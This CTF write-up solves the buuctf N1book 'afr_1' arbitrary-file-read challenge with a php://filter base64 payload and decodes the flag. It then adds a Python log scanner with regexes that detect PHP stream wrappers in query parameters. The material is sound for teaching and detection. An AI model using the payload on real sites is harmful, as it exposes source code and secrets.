buuctf N1book
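OK, let's continue with buuctf N1book.
afr_1 Arbitrary file read
Open the target and notice the hint in the URL: the "p=" parameter is an arbitrary file read. Use the PHP pseudo-protocol php://filter/read=convert.base64-encode/resource=index.php, which base64-encodes the file so that its source is returned instead of being executed.
?p=php://filter/read=convert.base64-encode/resource=flag (no suffix here, because the original p=hello has no suffix, so the backend presumably appends one)
This returns PD9waHAKZGllKCdubyBubyBubycpOwovL24xYm9va3thZnJfMV9zb2x2ZWR9
Base64 decoding gives: n1book{afr_1_solved}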
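Seen from the defending side, the requests above stand out in a web access log because a page-name parameter carries a PHP stream wrapper. The following is an added example, not part of the original writeup: a small log scanner that flags such parameters and reports which file the filter chain targeted. The log lines, the function name scan and the regex names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# PHP stream wrappers that should never appear in a page-name parameter.
WRAPPER_RE = re.compile(
    r"(?:php|data|expect|zip|phar|file|glob|compress\.\w+)://", re.I)
# File requested through php://filter (the part after resource=).
RESOURCE_RE = re.compile(r"resource=([^|&\s]+)", re.I)
# Request target inside a combined-log-format line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample access log (not taken from the challenge server).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /?p=hello HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] '
    '"GET /?p=php://filter/read=convert.base64-encode/resource=index.php HTTP/1.1" 200 0',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] '
    '"GET /?p=php://filter/read=convert.base64-encode/resource=flag HTTP/1.1" 200 60',
    # Same request as a client would send it percent-encoded.
    '203.0.113.7 - - [01/Jan/2024:10:00:12 +0000] '
    '"GET /?p=PHP%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag'
    ' HTTP/1.1" 200 60',
]

def scan(lines):
    """Return (param, decoded_value, resource) for each wrapper-bearing parameter."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a request line we understand
        query = urlsplit(match.group(1)).query
        # parse_qsl percent-decodes each value once, like the web server does.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if WRAPPER_RE.search(value):
                res = RESOURCE_RE.search(value)
                findings.append((name, value, res.group(1) if res else None))
    return findings

if __name__ == "__main__":
    for name, value, resource in scan(SAMPLE_LOG):
        print(f"suspicious {name}= -> wrapper request for {resource!r}: {value}")
```

Detection only tells you the probe happened; the fix is to map the p value to a fixed allowlist of page names before it reaches include.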